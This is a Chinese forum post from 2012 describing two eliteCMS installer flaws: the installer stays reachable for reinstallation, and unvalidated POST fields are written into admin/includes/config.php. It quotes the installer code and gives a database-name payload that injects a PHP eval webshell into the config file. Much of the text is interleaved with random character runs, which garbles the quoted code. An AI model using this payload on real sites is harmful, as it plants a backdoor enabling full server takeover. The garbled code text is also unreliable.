eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
! [* D( I1 A- Z
# C% a) E u2 E% ^另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php: R; O: M9 X. Q3 J9 T" z4 W
我们来看代码:
# p8 a$ S$ z8 ]9 D8 m6 o
: X% F; k9 s: M. D1 h! z* ^7 ^/ s...
* I2 `4 l$ }% h- o7 {% Qelseif ($_GET['step'] == "4") { ?6 q' v o, q" l' s6 y
$file = "../admin/includes/config.php";
) G# u% v: u) ? $write = "<?php\n";8 n) g7 q F9 h! ^+ |; U
$write .= "/**\n";
, u, X8 v( l4 Y* p8 a $write .= "*\n";
" R" A$ f8 R# B8 L1 ~# n* z $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";9 q Z9 T5 Q3 d2 T/ \4 H
...略...8 w+ _1 w b& P% W8 o
$write .= "*\n"; M" F! J1 O+ r* Q/ _/ \
$write .= "*/\n";
I( p' W D' _. Y( S: d" p $write .= "\n";
5 r# L* O( i5 E% h $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";! U& S: K- Y* ], _- \
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";9 N/ k: u1 q7 c; C
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";& U6 ?! n! H7 s& ~& U
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";' U+ I( E! B! j. `8 F
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
! T% x; V/ x/ i. A7 O $write .= "if (!\$connection) {\n";) z2 r8 d9 a/ N3 a
$write .= " die(\"Database connection failed\" .mysql_error());\n";% }8 G5 c6 c* X
$write .= " \n";
$ v+ \* X9 f" t1 i3 P+ @ $write .= "} \n";
( ]. {3 v# `1 @ $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
1 z8 x( @; R$ W; V: Q/ ~, I $write .= "if (!\$db_select) {\n";/ s+ O8 l( n% i5 Q0 {7 A( p
$write .= " die(\"Database select failed\" .mysql_error());\n";
# U$ u8 H, T: |- S8 A+ A& S8 z1 D $write .= " \n";
y/ x) }0 n/ ~! s7 | $write .= "} \n";
) ?" G! P2 F% Y3 g( p5 B $write .= "?>\n";
( Y# a# p9 x# o9 X1 ~1 d8 l( w
9 F3 H0 l" _: {6 O $writer = fopen($file, 'w');
/ e* f# M0 X& H' g# D; d$ B+ `...1 Q4 u, f0 G- F3 V6 A
6 i7 [0 b; A. j在看代码:8 }8 v: ^: F7 j$ J4 A/ J
# ]$ h/ s/ a1 I1 j$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
+ k, e/ L3 ^3 h ]4 j4 R$_SESSION['DB_NAME'] = $_POST['DB_NAME']; _$ k8 I* E7 |$ X9 k
$_SESSION['DB_USER'] = $_POST['DB_USER'];
3 }0 Y8 s+ Z& e, S% o0 [8 k9 l$_SESSION['DB_PASS'] = $_POST['DB_PASS'];0 ^1 |" C0 E; C- p$ l
' Z) y; v# u& J8 d' h# C) z8 ~- W6 r
取值未作任何验证
2 b; e1 t+ X4 @如果将数据库名POST数据:" p0 L- e- y# M5 C4 O
: v$ {! P5 j8 G+ f* \; a- ?! Z1 v
"?><?php eval($_POST[c]);?><?php$ x8 N7 h5 u7 Y2 E8 W+ C
- M( O; L7 @$ g; e' R将导致一句话后门写入/admin/includes/config.php
9 Z8 z# X8 r6 ], D |
发表于 2012-11-18 13:59:27
收藏
支持
反对